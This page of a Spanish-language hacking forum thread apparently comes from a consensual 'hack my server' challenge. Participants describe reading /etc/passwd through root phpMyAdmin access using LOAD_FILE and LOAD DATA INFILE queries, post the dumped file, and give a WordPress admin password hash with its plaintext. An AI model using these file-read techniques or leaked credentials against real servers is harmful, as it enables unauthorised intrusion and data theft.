elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Hack my server II
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 Ir Abajo Respuesta Imprimir
Autor Tema: Hack my server II  (Leído 79,717 veces)
#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: Hack my server II
« Respuesta #80 en: 1 Agosto 2014, 19:23 pm »

Es que lo mas gracioso de todo es que la carpeta /uploads no existe xD
Código
  1. http://host.net/wp-content/uploads/

Saludos
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Hack my server II
« Respuesta #81 en: 1 Agosto 2014, 19:30 pm »

No hay permisos de escritura en la carpeta upload tampoco, lo acaba de probar, trate de hacer un post y esto fue lo que me dijo:

The uploaded file could not be moved to .

Aunque bien puede ser que no exista la carpeta uploads o que haya un .htaccess denegando xD.
En línea

Baal_30

Desconectado Desconectado

Mensajes: 248



Ver Perfil
Re: Hack my server II
« Respuesta #82 en: 1 Agosto 2014, 19:42 pm »

"tonto" jejeje

Teniendo la pass de admin, ¿no se pueden crear directorios y tal? O sea, crear la carpeta upload y todo eso... ¿o eso se hace sólo desde el server con algún programa de los que se usan?

Disculpen mi ignorancia :/
En línea

«La suerte es el cuidado de los detalles». -Winston Churchill
MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Hack my server II
« Respuesta #83 en: 1 Agosto 2014, 19:44 pm »

"tonto" jejeje

Teniendo la pass de admin, ¿no se pueden crear directorios y tal? O sea, crear la carpeta upload y todo eso... ¿o eso se hace sólo desde el server con algún programa de los que se usan?

Disculpen mi ignorancia :/

Esa pass la ha puesto yo xD así que dudo mucho que haya otro servicio con esa password xDDD. Alguien cambio la password original de todos modos, así que no podemos saber si la pass original servia para otras cosas.
En línea

Baal_30

Desconectado Desconectado

Mensajes: 248



Ver Perfil
Re: Hack my server II
« Respuesta #84 en: 1 Agosto 2014, 19:48 pm »

jaja pues si tuvieramos la pass original quizás serviría para otras cosas... pero bueno, entrando con la cuenta de admin y esa pass no se puede hacer lo que necesitamos ¿?
En línea

«La suerte es el cuidado de los detalles». -Winston Churchill
#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: Hack my server II
« Respuesta #85 en: 1 Agosto 2014, 20:09 pm »

Buenas


Algo de progreso...

/etc/passwd - sin contraseñas :(
Código
  1. root:x:0:0:root:/root:/bin/bash
  2. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  3. bin:x:2:2:bin:/bin:/bin/sh
  4. sys:x:3:3:sys:/dev:/bin/sh
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/bin/sh
  7. man:x:6:12:man:/var/cache/man:/bin/sh
  8. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  9. mail:x:8:8:mail:/var/mail:/bin/sh
  10. news:x:9:9:news:/var/spool/news:/bin/sh
  11. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  12. proxy:x:13:13:proxy:/bin:/bin/sh
  13. www-data:x:33:33:www-data:/var/www:/bin/sh
  14. backup:x:34:34:backup:/var/backups:/bin/sh
  15. list:x:38:38:Mailing List Manager:/var/list:/bin/s...
  16. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  17. gnats:x:41:41:Gnats Bug-Reporting System (admin):/...
  18. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  19. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  20. fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal...
  21. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  22. syslog:x:103:106::/home/syslog:/bin/false
  23. klog:x:104:107::/home/klog:/bin/false
  24. bind:x:105:109::/var/cache/bind:/bin/false
  25. smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se...
  26. smmsp:x:107:111:Mail Submission Program,,,:/var/li...
  27. landscape:x:108:112::/var/lib/landscape:/bin/false
  28. mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos
En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: Hack my server II
« Respuesta #86 en: 1 Agosto 2014, 20:15 pm »

Please, explica como llegaste hasta ahi :-)
En línea




xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: Hack my server II
« Respuesta #87 en: 1 Agosto 2014, 20:22 pm »

Buenas


Algo de progreso...

/etc/passwd - sin contraseñas :(
Código
  1. root:x:0:0:root:/root:/bin/bash
  2. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  3. bin:x:2:2:bin:/bin:/bin/sh
  4. sys:x:3:3:sys:/dev:/bin/sh
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/bin/sh
  7. man:x:6:12:man:/var/cache/man:/bin/sh
  8. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  9. mail:x:8:8:mail:/var/mail:/bin/sh
  10. news:x:9:9:news:/var/spool/news:/bin/sh
  11. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  12. proxy:x:13:13:proxy:/bin:/bin/sh
  13. www-data:x:33:33:www-data:/var/www:/bin/sh
  14. backup:x:34:34:backup:/var/backups:/bin/sh
  15. list:x:38:38:Mailing List Manager:/var/list:/bin/s...
  16. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  17. gnats:x:41:41:Gnats Bug-Reporting System (admin):/...
  18. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  19. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  20. fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal...
  21. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  22. syslog:x:103:106::/home/syslog:/bin/false
  23. klog:x:104:107::/home/klog:/bin/false
  24. bind:x:105:109::/var/cache/bind:/bin/false
  25. smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se...
  26. smmsp:x:107:111:Mail Submission Program,,,:/var/li...
  27. landscape:x:108:112::/var/lib/landscape:/bin/false
  28. mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos


Usando el interprete sql de phpmyadmin
select load_file("/etc/passwd") from dual

Yo llevo rato leyendo files para ver si descubro algun path... he estado mirando por los *.conf de apache pero no encuentro nada pa pillar el path de la web.....
En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: Hack my server II
« Respuesta #88 en: 1 Agosto 2014, 20:24 pm »

Perdon xD

Bueno, tenemos acceso a PHPMyAdmin como root, tenemos todos los privilegios, esto lo podemos ver usando la pestaña Users de PHPMyAdmin.

root    127.0.0.1    No    ALL PRIVILEGES    Yes

Sabiendo esto, sabemos que tenemos acceso a funciones como LOAD DATA o DUMPFILE.

Por tanto, podemos crear una tabla, y usar LOAD DATA para ver el contenido de ficheros a los que tenemos acceso.

Código
  1. LOAD DATA INFILE '/etc/passwd' INTO TABLE BaseDeDatos.tabla;


PD: @xustyx has mirado el directorio de webmin ? Yo es que no lo encuentro por ninguna parte xD


PD2: He vuelto a poner la contraseña original del usuario admin de WP (aclaro que no fui yo el que la cambio).  Para quitaros trabajo inútil:
 a7c85c1a6114797d06425195899a8abe = 2bc11f

PD3: El directorio de webmin es /usr/share/webmin

Saludos
« Última modificación: 1 Agosto 2014, 20:40 pm por #!drvy » En línea

daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Hack my server II
« Respuesta #89 en: 1 Agosto 2014, 20:34 pm »

aun se puede pedir la ip ? jeje
En línea

buenas
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Counter Strike 1.5 Hack Server
Juegos y Consolas
*StoW* 0 3,450 Último mensaje 19 Octubre 2006, 22:22 pm
por *StoW*
Internal Server Error(hack web cross)
WarZone
Angbroda 5 6,010 Último mensaje 3 Marzo 2009, 17:39 pm
por © Shadoweps ツ
Torneo Hack my Server « 1 2 ... 6 7 »
Foro Libre
dimitrix 62 20,747 Último mensaje 1 Agosto 2014, 03:04 am
por dimitrix
Hack My Server III « 1 2 »
Foro Libre
dimitrix 16 5,879 Último mensaje 30 Marzo 2015, 18:47 pm
por elmatador2
Hack my server 2018 « 1 2 »
Hacking
dimitrix 16 18,828 Último mensaje 28 Mayo 2018, 22:06 pm
por hitori batusai
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines